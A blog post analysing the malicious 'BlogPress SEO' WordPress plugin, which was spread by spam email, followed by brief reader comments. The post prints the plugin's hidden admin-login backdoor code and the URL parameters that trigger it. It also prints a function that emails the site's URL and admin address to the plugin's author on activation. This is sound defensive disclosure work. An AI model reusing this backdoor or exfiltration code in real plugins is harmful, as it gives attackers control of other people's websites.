As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML sitemaps), and never plan on doing so. Anyways, the sender’s name as Saurabh, and his message was as follows:
Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100’s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. http://BlogPressSEO.com Why backlinks are important for getting traffic. http://BlogPressSEO.com/#1 This is how the plugin works http://BlogPressSEO.com/#2 Thanks
Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So, I downloaded it, and did not like what I saw. Not only are there malicious components, there are several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of stylistic issues:
- Did not use a unique prefix to functions to work avoid function name collisions. Function names such as:
fun_serverpath
,SureRemoveDir
,fun_create_menu_wplink
wplink_activate
,cleansee
, etc. While is looks like fun_ is the unique prefix the author is using, fun is too common of a word for a prefix and is used to denote a quantity is a function in some programming styles. Plus there is a ton of inconsistency between function names. - Saves it’s settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and does slow down every page load by a little bit. At least the author seems to use hwe_ as the option prefix for most of the options it creates, too bad this was not done for the functions.
- Performs manual sql queries, not using the
$wpdb
object.
Analysis of the code is a little frightening. Look at this block of code:
//if loginyes and emial then login
if($loginyes==1 && $email==get_option('admin_email'))
{
global $wpdb;
$tabname=$wpdb->prefix."users";
$find_admin_sql="select * from $tabname where user_login='admin'";
$find_sql=mysql_query($find_admin_sql);
$user_numrow=mysql_num_rows($find_sql);
if($user_numrow!=0)
{
$user_login='admin';
}
if($user_numrow==0)
{
$find_ana_admin_sql="select * from $tabname";
$find_sql_res=mysql_query($find_ana_admin_sql);
while($row_find=mysql_fetch_array($find_sql_res))
{
$userid=$row_find['ID'];
$user_login_find=$row_find['user_login'];
$level=get_usermeta( $userid,'wp_user_level');
if($level==10)
{
$user_login=$user_login_find;
break;
}
}
}
$user=new WP_User(0, $user_login);
$user_pass = md5($user->user_pass);
wp_login($user_login, $user_pass, true);
wp_setcookie($user_login, $user_pass, true);
wp_set_current_user($user_id, $user_login);
$radirect=get_option('home')."/wp-admin";
echo "<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-wp-preserve="%3Cscript%20language%3D%22javascript%22%3E%22%3B%3Cbr%20%2F%3E%0A%09echo%20%22location.replace('%24radirect')%22%3B%3Cbr%20%2F%3E%0A%09echo%20%22%3C%2Fscript%3E" data-mce-resize="false" data-mce-placeholder="1" class="mce-object" width="20" height="20" alt="&lt;script&gt;" title="&lt;script&gt;" />";
}
Well, looks like a backdoor, right? Knowing that $loginyes
and $email
are set using get superglobals is even more worrying. Just append ?loginyes=1&email= to any url on a site running this script will get you in, all you need to know is the email address of the admin. Now, who would have that information?
function email_send_fun()
{
$headers="From:".get_option('admin_email')."\n";
$headers.="Reply-to:".get_option('admin_email')."\n";
$sub="BlogPressSeo new installation.";
$mes=get_option('siteurl');
$to="info@blogpressseo.com";
mail($to,$sub,$mes,$headers);
$hwe_blogidd=get_option("hwe_blogid");
update_option("hwe_saveradio_option",3);
update_option("hwe_linkplacement",3);
if($hwe_blogidd)
{
wplink_activate();
}
}
Oh, right, that would be whoever reads info@blogpressseo.com. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. This function runs every time the plugin is activated.
If you have installed this plugin, delete it immediately. Then, change your admin email address (under Settings > General, look for the option E-mail address). You’ll have to manually clean up your wp_options table as the author did not provide an uninstall method.
Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath“.
-John Havlik
Thanks for the Heads up….
Its really bad!
why he do it?
he’s trying to hack all wp and inject his link to get more backlink maybe?
regards
It is really bad.
Being an IT guy, we can’t just install plugins. It is better to investigate like this and then only install.
Thanks for this info.